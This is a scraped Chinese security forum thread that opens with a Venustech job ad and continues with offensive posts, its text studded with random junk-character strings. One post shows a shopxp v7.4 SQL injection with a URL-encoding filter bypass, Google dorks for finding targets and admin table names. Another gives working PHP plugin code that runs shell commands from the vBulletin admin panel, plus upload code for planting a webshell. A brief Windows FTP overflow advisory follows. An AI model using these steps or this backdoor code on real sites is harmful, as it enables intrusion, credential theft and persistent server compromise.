返回列表 发帖
  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 1年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: liu_yanhua@venustech.com.cn
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    岗位:备机库主管
      m3 D1 v$ O! D+ ~3 @: A* Q& r4 S- ~3 Z' A& x

    , I; [% ^) t4 |% M) N2 A% A岗位职责:
    , T7 [+ \" _3 t8 d+ h/ I& P4 m% G7 w# e9 m- }& G& ~1 C4 m. H
    1.负责公司产品备机库的管理。
    * @: c) a5 U. ^8 j2 S1 {- h5 e/ U0 n% }& C6 h5 j) I& S1 L
    2.产品安装调试。
    6 p( K1 P8 L0 {$ u& W- o2 f8 \% {
    3.对备机使用情况做统计分析。# r3 [8 D' R$ @4 _1 i; u. T

    4 d1 j+ \8 E9 j% a- g岗位要求:
    ! A5 s" a) @, E. I
    5 [) @4 ~% ~3 n8 _5 z$ h, \/ u1.熟悉客户关系管理、网络安全相关知识;了解数据统计分析技术。
    5 ]5 s( D+ ^  _3 x5 L2 x) [5 I$ C5 k3 V! o' s
    2.熟悉路由器、交换机等常用网络设备。
    . l! [% h, Y/ Z4 J- \. x7 }1 c  K" W5 u5 Y2 s  T- I, j) J5 g
    3.熟悉防火墙、VPN等常见网络安全产品。
    : |/ w2 r: h# s3 ?/ I5 Q. Y$ [, e1 P! c9 z
    4.了解计算机硬件相关知识。
    ; }- V, M; x( r3 V5 O
    & r; Q0 g  T6 v2 c5 o% _5 b3 @5.一年以上硬件技术支持经验,有网络安全行业经验优先考虑。! |& B" `7 K% I  D9 w5 i9 Z
    0 O/ u- [- G4 C5 {, }8 z
    6.有较强的责任心,有敬业精神,有良好的沟通能力、动手能力,有团队合作精神,学习能力强。
    + R* S5 P; K9 Q3 R! u' b8 e1 L" h% |" g: m, \, f; {7 O
    发送简历

     

    您可能还想看的主题:

    浙江政安信息安全研究中心招贤纳士啦!

    启明星辰研发招聘

    合优网站管理系统存在SQL注射。。。原创首发~

    联想研究院 安全职位

    PHP VS ASP

    计算机硬件维护知识

    1

    评分人数

      • webmaster: 楼主MJJ威望 + 30 金钱 + 200 金
    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    shopxp v7.4 SQL注入漏洞
    shopxp网上购物系统 v7.4存在Sql注入漏洞。问题文件:xpCatalog_xpDesc.asp,xpCatalog_xpsmall_Desc.asp问题代码:<% - x7 w; J3 Q* T; [2 G& G+ [
    dim shopxpbe_id, anclassname, shopxpse_id, nclassnamedim totalPut dim CurrentPage, TotalPages

    8 S. s2 o3 Q' r3 v
    if request("shopxpbe_id")<>"" thenshopxpbe_id=request("shopxpbe_id")elseshopxpbe_id=0end ifif request("shopxpbe_id")="" then shopxpbe_id=1end ifif not isempty(request("page")) thencurrentPage=cint(request("page"))elsecurrentPage=1end if
    ( c" k% i. [6 x  H* Q8 M1 Z
    set rs=server.createobject("adodb.recordset")rs.open "select * from shopxp_btype where shopxpbe_id="&amp;shopxpbe_id,conn,1,1anclassname=rs("shopxpbe_name")rs.close%>并没有对shopxpbe_id进行整形判断。下面在说说他的防注入系统。好像是网上的枫叶防注入。看代码吧:Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_ZxFy_Cl = 2 '处理方式:1=提示信息,2=转向页面,3=先提示再转向Fy_Zx = "../" '出错时转向的页面On Error Resume NextFy_Url=Request.ServerVariables("QUERY_STRING")Fy_a=split(Fy_Url,"&amp;")redim Fy_Cs(ubound(Fy_a))On Error Resume Nextfor Fy_x=0 to ubound(Fy_a)Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1)NextFor Fy_x=0 to ubound(Fy_Cs)If Fy_Cs(Fy_x)<>"" ThenIf Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 Or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 ThenSelect Case Fy_Cl省略部分代码

    / N5 E3 P# J( K2 ?
    这个防注入系统在网上貌似很火,但是他防的是有问题的。关键是这句,Fy_Url=Request.ServerVariables("QUERY_STRING"),Request.ServerVariables得到的数据是原样的,并不会进行URL解码。这也就导致可以进行URL编码绕过这个防注入。以下是lake2对这段代码的分析:
    5 z. |# A' b$ U$ q4 _# m4 y
    “它的思路就是先获得提交的数据,以“&amp;”为分界获得并处理name/value组,然后判断value里是否含有定义的关键字(这里为求简便,我只留下了“and”),有之,则为注射。
    ' S7 V1 O1 m, Y0 J+ f& Q
    乍一看去,value被检查了,似乎没有问题。呵呵,是的,value不会有问题,可是,name呢?

    % P: r; F$ M# K, c4 }
    它的name/value组值来自于Request.ServerVariables("QUERY_STRING"),呵呵,不好意思,这里出问题了。Request.ServerVariables("QUERY_STRING")是得到客户端提交的字符串,这里并不会自动转换url编码,哈哈,如果我们把name进行url编码再提交的话,呵呵,那就可以绕过检查了。比如参数是ph4nt0m=lake2 and lis0,此时程序能够检测到;如果提交%50h4nt0m=lake2 and lis0(对p进行url编码),程序就会去判断%50h4nt0m的值,而%50h4nt0m会被转换为ph4nt0m,所以%50h4nt0m值为空,于是就绕过了检测。
    4 j- w. S% u) v% ?
    等等,为什么既然name不解码可以绕过检查而value就不能绕过呢?因为value的值取自Request(Fy_Cs(Fy_x)),这个服务器就会解码的。

    1 y9 V( e7 R& }* c1 }0 P3 n' T2 B
    程序怎么改进呢?只要能够得到客户端提交的数据是解码后的就可以了,把得到name的语句改为For Each SubmitName In Request.QueryString就可以了。”

    0 h' V- y- {% Z% z1 Q
    下面说下利用:Google:inurl:xpCatalog_xpDesc.asp?action_key_order=biginurl:Catalog_Desc.asp?action_key_order=big (这个貌似是商业版的)构造如下地址:http://www.sitedir.com.cn/xpCatalog_xpDesc.asp?action_key_order=big&amp;shopxpbe_%69d=79 (对i进行URL编码),交给工具 手动添加表名:shopxp_admin 和shop_admin(商业版的)默认后台是 admin_shopxp 或者admin

    + e6 a4 j& A% R8 ~: u: C8 w% y7 a. M3 T. G' V

    7 }3 A3 b+ l7 u! t/ C4 [, F- X. X% r) H5 w+ @- y3 s
    ( C: m3 l, d7 v
    6 R# E( ~- j6 Z. P, V
      g3 s0 c1 O9 u; \- D  v
    $ c' N2 d& M- ?, z/ {8 T: L, s! h
    % J2 U! ?9 S8 B: X) j% _4 z
    $ H: o& W' C: i; k0 |
    ( N! h0 L0 J6 k

    " ?0 V2 p  @( p3 k" \: d1 M) \2 r# d# o5 v2 t9 p+ m6 O8 M) M

    ) W# K( A% p: C$ ~4 q" K6 ~: v( r8 `) d7 [$ a; {. ]0 I
    & t" o  `! C  |; {% C& t1 U

    # K4 t( G' K3 o; o3 B3 `6 I4 r! I4 m) ?6 }3 c

    - i/ I4 |# @. |0 P4 z. X公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    vBulletin后台获取webshell方法总结
    方法一:
    8 |+ n% g: ^9 ~1 Y/ f6 v8 x首先在“插件和产品”(Plugins and Products)下边选择插件管理(Plugin Manager),然后右边选择添加新插件(Add New Plugin),在“Hook Location”(不知道杂翻译)处选择ajax_complete,Title处随便写,比如JK7OSE,然后关键的地方到了“Plugin PHP Code”(插件PHP代码),输入if(isset($_GET['jkrose'])){echo "<h1>jkrose</h1><pre>"; system($_GET['jkrose']);exit;}注意,是去掉PHP的<? ?>标记的,这样就算完成了,利用时只需ajax.php?jkrose=cmd命令,可以wget一个webshell,可以ls -la,cat filename等YY的事。
    " N( Q( U0 l/ P& X/ ]  h
    0 G% L! \- j: h# g9 d( M6 n  a方法二:$ \- F# G: d* ]0 v% Q
    前边相同,代码处写一个接收上传的代码:
    : `0 O7 u3 N: e5 C7 T% F
    $target_path = "images/avatars"; //注意权限要为可写的
      |' ]( R+ M( S7 U% j: n( E
    $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
    . m" T! w" h) V8 z% d
    if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { 4 a4 v. p1 b; b0 L
        echo "The file ". basename( $_FILES['uploadedfile']['name']). ) z/ o& t( w% T/ W* S$ w/ V0 Q
        " has been uploaded";
    9 r4 q! F% u5 A* S} else{
    - o. t, r. O7 u) X; _    echo "There was an error uploading the file, please try again!";
    0 I# V+ ]5 d. i) e% @}

    1 _/ a* X( V' k4 U6 t3 H
       然后访问ajax.php会提示“No input File Specified”之类的,如果没出现的话那肯定时哪有问题了,如果出现了就继续下边的,在网站随便某个地方,只要能写HTML代码就行,写个上传,比如说模板编辑那些地方,写个上传代码:

    9 n# P8 X2 y% E% E; E& t8 v
    <form enctype="multipart/form-data" action="ajax.php" method="POST"> 2 N+ b$ x  |7 I( J' \+ w( \1 e3 A, Z
    <input type="hidden" name="MAX_FILE_SIZE" value="100000" />
    ! o0 y' `  O: UChoose a file to upload: <input name="uploadedfile" type="file" /><br />
    ( P8 W) S- S. H: ?7 i<input type="hidden" name="s" value="$session[sessionhash]" /> ( o# N8 n( E9 Q6 |0 Z4 H/ Y8 Q  v
    <input type="hidden" name="securitytoken" value="$bbuserinfo[securitytoken]" />
    $ F+ n- y9 f  `, k) L<input type="submit" value="Upload File" /> ) y) J6 R* d( i. t2 I* }
    </form>
    # O- T/ B" q8 c* L3 S+ U0 g4 N
    保存就完工了,最后如果时新添加的风格的话,要在网站左下角切换过来才能用# x7 T3 b+ U, P% K; ]

    . y- ^2 |7 B6 ^% ~3 ]/ {
    4 p; x( v# n. L4 Z& _- ^3 }& V! a  E( L: J$ a9 y
    4 d2 B: ?# i. _! e" y8 i9 U1 t

      B$ A  J  O; B3 t/ C; Y5 ^* X2 C
    9 L% @! M2 }! o3 ?
    8 C" [1 B+ N0 T8 z
    3 i$ ^: {7 M! u5 f& t
    2 v% s+ c1 [$ N$ p. ^
    + D9 W& r3 O, y8 h2 {5 N9 S' L% r& p7 \# Z  o

    + [6 D) }2 ?5 C- z7 p$ R' R8 t+ L

    8 S' `/ L) A: \; N
    8 w3 A" ~) i7 T
    & n' G- R/ i, ?. _3 d- W! d/ m
    ! `( F3 f* K* K0 Q4 A& b$ e* G
    : Y$ r2 u5 T( `5 ?, b  k( ?, s% ?  x9 N5 j% U
    6 [5 c0 |: M) \4 s5 \/ s
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Microsoft Windows FTP客户端有多个远程溢出漏洞
    受影响系统:Microsoft Windows XPMicrosoft Windows 2000SP4Microsoft Windows 2000 Server SP4
    1 r' ]5 Z/ k4 g7 \' f0 v
    描述:

    + [1 ^2 r+ j; G& l6 E6 N/ H' m
    Microsoft Windows是微软发布的非常流行的操作系统。

    1 |6 ?8 m, C2 z. V7 B: L9 T
    Windows系统自带的FTP客户端实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制客户端。
    9 L9 _( r! o5 T. D% }) P( m
    Windows操作系统所捆绑的FTP客户端没有正确地验证mget、dir、user、password、ls等命令,如果用户使用FTP客户端连接到了FTP服务器上带有超长文件夹名或文件名的目录并发布了上述命令的话,就可以触发缓冲区溢出,导致拒绝服务或执行任意指令。但这个漏洞较难利用,因为需要社会工程学且必须以有漏洞命令参数的形式注入shellcode。

    % q, F; `7 H' W; w* ]# O
    厂商补丁:

    3 Z6 T0 ?% f( C+ k3 l# y
    目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

    - Z) ?. v6 d5 P3 @) H3 s
    http://www.microsoft.com/technet/security/
    + E8 `3 n+ ^' _  u. C* a
    . x( j: J2 n& y  E

    % ]6 J& t6 d/ K8 G- f0 ?
    # Q3 \4 C4 `: T1 r6 I' P; f& m

    . [$ e1 T9 {2 a5 I( Z& h6 i/ [- u+ F8 z) O$ j+ I1 \

    + P2 K7 S7 v4 A' ]& S5 M; ]/ q6 S2 Y

    / N' j' y+ A; P* X/ L  f1 f( z3 T  k9 C( J. T: Q% _& F
    1 j6 o: ]' d' t, G9 c' X

    $ O5 \8 P0 I+ u/ K# K0 B1 ~: t2 B
    ) {, @- x/ z" }; Q* U: a- r: V8 K& T4 `

    $ Y" T& D( |. b4 t% p9 z, }, O; g$ K1 y0 \( W; _

    ( ~0 p1 l8 l6 B3 n. [0 `; v- r. T. e0 r- [) a( `2 c
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表